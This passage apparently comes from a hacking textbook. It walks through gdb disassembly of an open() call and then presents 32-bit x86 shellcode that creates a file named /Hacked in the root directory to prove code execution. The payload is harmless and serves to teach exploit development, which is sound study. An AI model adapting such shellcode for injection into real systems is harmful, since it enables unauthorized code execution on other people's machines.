Graphics Programs Reference
In-Depth Information
0x080487ee <main+143>: mov DWORD PTR [esp+8],eax
0x080487f2 <main+147>: mov eax,DWORD PTR [ebp-16]
0x080487f5 <main+150>: mov DWORD PTR [esp+4],eax
0x080487f9 <main+154>: mov DWORD PTR [esp],0x8048ac7
0x08048800 <main+161>: call 0x8048490 <printf@plt>
0x08048805 <main+166>: mov DWORD PTR [esp+8],0x180
0x0804880d <main+174>: mov DWORD PTR [esp+4],0x441
0x08048815 <main+182>: mov eax,DWORD PTR [ebp-16]
0x08048818 <main+185>: mov DWORD PTR [esp],eax
0x0804881b <main+188>: call 0x8048410 <open@plt>
---Type <return> to continue, or q <return> to quit---q
Quit
(
gdb)
Remember that the arguments to a function call will be pushed to the
stack in reverse. In this case, the compiler decided to use
mov DWORD PTR
[esp+
offset
],
value_to_push_to_stack
instead of
push
instructions, but the
structure built on the stack is equivalent. The first argument is a pointer to
the name of the file in EAX, the second argument (
put at [esp+4]
) is
0x441
,
and the third argument (
put at [esp+8]
) is
0x180
. This means that
O_WRONLY|
O_CREAT|O_APPEND
turns out to be
0x441
and
S_IRUSR|S_IWUSR
is 0x180. The
following shellcode uses these values to create a file called Hacked in the
root filesystem.
mark.s
BITS 32
; Mark the filesystem to prove you ran.
jmp short one
two:
pop ebx ; Filename
xor ecx, ecx
mov BYTE [ebx+7], cl ; Null terminate filename
push BYTE 0x5 ; Open()
pop eax
mov WORD cx, 0x441 ; O_WRONLY|O_APPEND|O_CREAT
xor edx, edx
mov WORD dx, 0x180 ; S_IRUSR|S_IWUSR
int 0x80 ; Open file to create it.
; eax = returned file descriptor
mov ebx, eax ; File descriptor to second arg
push BYTE 0x6 ; Close ()
pop eax
int 0x80 ; Close file.
xor eax, eax
mov ebx, eax
inc eax ; Exit call.
int 0x80 ; Exit(0), to avoid an infinite loop.
one:
call two
db "/HackedX"
; 01234567
